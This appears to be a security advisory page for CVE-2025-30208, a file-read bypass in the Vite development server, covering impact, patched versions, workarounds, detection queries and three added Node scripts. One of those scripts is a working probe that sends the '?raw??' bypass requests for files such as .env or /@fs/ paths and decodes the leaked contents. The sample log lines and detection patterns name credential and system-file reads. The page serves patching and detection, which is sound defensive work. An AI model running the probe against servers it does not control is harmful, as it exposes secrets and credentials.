CVE-2025-30208
📋 TL;DR
This CVE describes a file-access restriction bypass in the Vite development server. Appending '?raw??' or '?import&raw??' to a request URL makes the dev server return the contents of a file even when its serving allow list or server.fs.deny should have refused it, so anyone who can reach the dev server can read any file the Vite process itself can read (a project's .env, or any absolute path via the /@fs/ route). Only applications that explicitly expose their Vite dev server to the network (using --host or the server.host config option) are affected; the default listens on localhost only.
💻 Affected Systems
- Vite
📦 What is this software?
Vite by Vitejs
⚠️ Risk & Real-World Impact
Worst Case
Sensitive files like configuration files, environment variables, or source code could be exfiltrated, potentially exposing credentials, API keys, or intellectual property.
Likely Case
Attackers could read project files, configuration files, or other sensitive data stored in the Vite project directory or accessible file system paths.
If Mitigated
If the Vite dev server is not exposed to the network (the default, which binds to localhost only), remote attackers cannot reach it and there is no risk. Even when exposed, impact is limited to reading files the dev-server process can read; the bug gives no write access or code execution.
🎯 Exploit Status
Exploitation is straightforward and needs no authentication when the dev server is reachable: send a GET for the target file with ?raw?? or ?import&raw?? appended, for example /.env?raw?? for a file under the project root, or /@fs/<absolute path>?import&raw?? for any other readable file. A vulnerable server answers with the file contents as a JavaScript module (export default "..."); a patched server refuses the request.
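As an added example that is not part of the advisory or the Vite project, the following Node 18+ script sends both request forms to a dev server you control and decodes what comes back. The origin, the request path, the sample body and the function names (buildProbeUrls, decodeRawModule, classify, probe) are this example's own.

```javascript
// Added example (not from the Vite project or the advisory): probe a dev
// server you control for CVE-2025-30208. Requires Node 18+ (global fetch).
//   node probe-vite-raw.js http://127.0.0.1:5173 .env
//   node probe-vite-raw.js http://127.0.0.1:5173 @fs/etc/hosts
// All names below are this example's own, not Vite APIs.

// The two request forms named in the advisory, applied to one request path.
// A project-relative path (".env") and the @fs route ("@fs/<absolute path>")
// are both valid request paths here.
function buildProbeUrls(origin, requestPath) {
  const base = origin.replace(/\/+$/, '');
  const path = requestPath.replace(/^\/+/, '');
  return [`${base}/${path}?raw??`, `${base}/${path}?import&raw??`];
}

// A served ?raw import is an ES module whose default export is the file
// contents as a JSON string literal, e.g. export default "KEY=value\n".
// Returns the decoded text, or null when the body has a different shape
// (an HTML fallback page, an error message, a normal module).
function decodeRawModule(body) {
  const m = /^\s*export default ("(?:[^"\\]|\\.)*")/.exec(body);
  if (!m) return null;
  try { return JSON.parse(m[1]); } catch { return null; }
}

// Turn one HTTP response into a verdict. 200 with a raw-module body is a
// confirmed leak; 403 is the dev server refusing the path.
function classify(status, body) {
  if (status === 200) {
    const text = decodeRawModule(body);
    if (text !== null) return { verdict: 'LEAKED', bytes: text.length, preview: text.slice(0, 80) };
    return { verdict: 'INCONCLUSIVE', reason: '200 but body is not a raw module' };
  }
  if (status === 403) return { verdict: 'DENIED' };
  if (status === 404) return { verdict: 'NOT_FOUND' };
  return { verdict: 'INCONCLUSIVE', reason: `HTTP ${status}` };
}

// Live probe: one request per bypass form, verdicts collected in order.
async function probe(origin, requestPath) {
  const results = [];
  for (const url of buildProbeUrls(origin, requestPath)) {
    const res = await fetch(url, { headers: { Accept: '*/*' } });
    results.push({ url, ...classify(res.status, await res.text()) });
  }
  return results;
}

// Constructed response body of the shape a vulnerable server returns for
// /.env?raw?? (the secrets are made up for the example).
const SAMPLE_BODY = 'export default "DB_PASSWORD=hunter2\\nAPI_KEY=abc123\\n"';

if (typeof process !== 'undefined' && process.argv.length >= 4) {
  probe(process.argv[2], process.argv[3])
    .then(r => console.log(JSON.stringify(r, null, 2)))
    .catch(e => { console.error(e.message); process.exitCode = 1; });
} else {
  // Offline demonstration: decode the constructed body.
  console.log(classify(200, SAMPLE_BODY));
}
```

Run it only against servers you are authorised to test. A LEAKED verdict for a path that server.fs.deny covers (such as .env) on a server that is otherwise correctly configured is the confirmation that the installed Vite is unpatched.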
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.2.3, 6.1.2, 6.0.12, 5.4.15, or 4.5.10 depending on your major version
Vendor Advisory: https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w
Restart Required: Yes
Instructions:
1. Check the installed version(s): npm list vite. Nested copies pulled in by other tools are listed too, and every copy that can start a dev server needs to be at a fixed release.
2. Update: npm install vite@latest, or pin the fixed release for your line, e.g. npm install -D vite@6.2.3 (6.1.2, 6.0.12, 5.4.15 or 4.5.10 for the other lines). Note that npm update vite only moves within the range already declared in package.json, which can stop short of the fix.
3. Restart the Vite dev server.
🔧 Temporary Workarounds
Disable network exposure
Remove the --host flag and any server.host configuration so that the Vite dev server listens on localhost only and is not reachable over the network:
Remove '--host' from dev script in package.json
Remove or set 'server.host' to false in vite.config.js
🧯 If You Can't Patch
- Do not expose Vite dev server to network (remove --host flag and server.host configuration)
- Use network segmentation/firewall rules to restrict access to the Vite dev server port (5173 by default in Vite 3 and later, 3000 in Vite 2, or whatever server.port is set to)
🔍 How to Verify
Check if Vulnerable:
The server is vulnerable if it runs with the --host flag or a server.host setting that binds a non-loopback address, and the installed Vite version is below the fixed release for its line (6.2.3, 6.1.2, 6.0.12, 5.4.15 or 4.5.10)
Check Version:
npm list vite | grep vite
Verify Fix Applied:
After the update, confirm that every listed copy of vite is at or above the fixed release for its line: 6.2.3 (6.2.x and later), 6.1.2 (6.1.x), 6.0.12 (6.0.x), 5.4.15 (5.x), or 4.5.10 (4.x and earlier)
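Both the fix procedure above and this verification step come down to comparing each installed copy of vite against the fixed release for its line. As an added example (not a Vite or npm tool), this Node script does that comparison over the JSON tree that npm ls vite --json --all prints; the sample tree is constructed, and the function names (parseVersion, firstFixed, isPatched, findVite, report) are this example's own.

```javascript
// Added example (not from the Vite project): decide whether each installed
// copy of vite is patched for CVE-2025-30208, using the fixed releases the
// advisory lists. Paste real `npm ls vite --json --all` output in place of
// SAMPLE_TREE, or adapt it to read stdin. Function names are this example's own.

function parseVersion(s) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(String(s).trim());
  if (!m) return null;
  return { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] || null };
}

// First fixed release for the line a version belongs to. Per the advisory,
// everything at or below 4.5.9 (including 2.x and 3.x) is affected.
function firstFixed(v) {
  if (v.major >= 6) {
    if (v.major > 6 || v.minor >= 2) return '6.2.3';
    return v.minor === 1 ? '6.1.2' : '6.0.12';
  }
  if (v.major === 5) return '5.4.15';
  return '4.5.10';
}

// Semver ordering on major.minor.patch; a prerelease sorts before the
// corresponding release, so 6.2.3-beta.1 is still below 6.2.3.
function compare(a, b) {
  for (const k of ['major', 'minor', 'patch']) if (a[k] !== b[k]) return a[k] - b[k];
  if (a.pre && !b.pre) return -1;
  if (!a.pre && b.pre) return 1;
  return 0;
}

// true = patched, false = vulnerable, null = version string not understood.
function isPatched(version) {
  const v = parseVersion(version);
  if (!v) return null;
  return compare(v, parseVersion(firstFixed(v))) >= 0;
}

// Walk the npm ls tree and collect every dependency named "vite", with the
// path through which it was pulled in (nested copies matter too).
function findVite(node, path = [], out = []) {
  for (const [name, dep] of Object.entries(node.dependencies || {})) {
    const here = [...path, name];
    if (name === 'vite' && dep.version) out.push({ path: here.join(' > '), version: dep.version });
    findVite(dep, here, out);
  }
  return out;
}

function report(tree) {
  return findVite(tree).map(({ path, version }) => {
    const v = parseVersion(version);
    if (!v) return { path, version, firstFixed: null, status: 'unknown' };
    return { path, version, firstFixed: firstFixed(v), status: isPatched(version) ? 'patched' : 'VULNERABLE' };
  });
}

// Constructed sample resembling `npm ls vite --json --all` for a project with
// a patched top-level vite and an older nested copy brought in by a tool.
const SAMPLE_TREE = {
  name: 'example-app',
  version: '1.0.0',
  dependencies: {
    vite: { version: '6.2.3' },
    'some-dev-tool': {
      version: '2.0.0',
      dependencies: { vite: { version: '5.4.14' } },
    },
  },
};

console.table(report(SAMPLE_TREE));
```

Any copy that can actually start the dev server needs to be patched, not just the top-level one, which is why the script reports nested copies with the dependency path that brought them in.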
📡 Detection & Monitoring
Log Indicators:
- Requests whose target contains '?raw??' or '?import&raw??' (match on the URL-decoded target as well, since proxies and log pipelines differ in whether they store it decoded)
- Access to files outside normal project paths
Network Indicators:
- HTTP requests to Vite dev server port with unusual query parameters
- File read attempts via @fs paths with bypass parameters
SIEM Query:
(http.url:*\?raw\?\?* OR http.url:*\?import&raw\?\?*) AND destination.port:(5173 OR 3000)
In Lucene-style syntax '?' is a single-character wildcard, so it must be escaped to match literally, and the OR must be parenthesised or the port filter only applies to the second pattern. Replace the port list with whatever server.port your dev servers actually use.
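As an added example that is not part of this advisory, the following Node script applies the log indicators above to constructed access-log lines. Vite writes no access log of its own; the lines are in the common log format a reverse proxy or host logger in front of the dev server would produce. The IPs, timestamps and function names (parseLine, classifyRequest, scanLog, summarize) are made up for the example.

```javascript
// Added example (not part of the advisory): flag CVE-2025-30208 bypass
// attempts in access logs for a Vite dev server. The sample lines below are
// constructed in common log format; function names are this example's own.

const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/;

// The two query markers from the advisory. A plain "?raw" import is normal
// Vite usage and must not match; only the doubled "??" forms are flagged.
const BYPASS_MARKERS = ['?raw??', '?import&raw??'];

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], ts: m[2], method: m[3], target: m[4], status: +m[5], bytes: m[6] };
}

// Match on the decoded target so the result is the same whether the logger
// stored the request target raw or percent-encoded.
function classifyRequest(entry) {
  const target = safeDecode(entry.target);
  const marker = BYPASS_MARKERS.find(mk => target.includes(mk));
  if (!marker) return null;
  return {
    ip: entry.ip,
    ts: entry.ts,
    target,
    marker,
    viaFs: target.includes('/@fs/'),
    // A 200 means the server produced a body; confirming it was the file's
    // contents needs the response itself, but it is the signal to escalate.
    likelySuccess: entry.status === 200,
  };
}

function scanLog(lines) {
  return lines.map(parseLine).filter(Boolean).map(classifyRequest).filter(Boolean);
}

// Per-source summary for triage: how many attempts, how many answered 200.
function summarize(hits) {
  const byIp = {};
  for (const h of hits) {
    const s = byIp[h.ip] || (byIp[h.ip] = { attempts: 0, successes: 0, targets: [] });
    s.attempts += 1;
    if (h.likelySuccess) s.successes += 1;
    if (!s.targets.includes(h.target)) s.targets.push(h.target);
  }
  return byIp;
}

// Constructed log lines: ordinary dev traffic, two bypass attempts that got
// a 200, one percent-encoded attempt that was refused, and a legitimate ?raw.
const SAMPLE_LOG = [
  '10.0.0.5 - - [20/Mar/2025:10:01:02 +0000] "GET /src/main.ts HTTP/1.1" 200 1843',
  '10.0.0.5 - - [20/Mar/2025:10:01:03 +0000] "GET /.env?raw?? HTTP/1.1" 200 212',
  '10.0.0.9 - - [20/Mar/2025:10:02:10 +0000] "GET /@fs/etc/passwd?import&raw?? HTTP/1.1" 200 2794',
  '10.0.0.9 - - [20/Mar/2025:10:02:11 +0000] "GET /.env%3Fraw%3F%3F HTTP/1.1" 403 0',
  '10.0.0.7 - - [20/Mar/2025:10:03:00 +0000] "GET /src/App.vue?raw HTTP/1.1" 200 912',
];

console.log(JSON.stringify(summarize(scanLog(SAMPLE_LOG)), null, 2));
```

Point it at the real proxy log (one line per array element) and treat any source with successes greater than zero as an incident: the dev server has handed out file contents, and the targets list tells you which files to assume compromised.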
🔗 References
- https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4
- https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c
- https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41
- https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca
- https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1
- https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w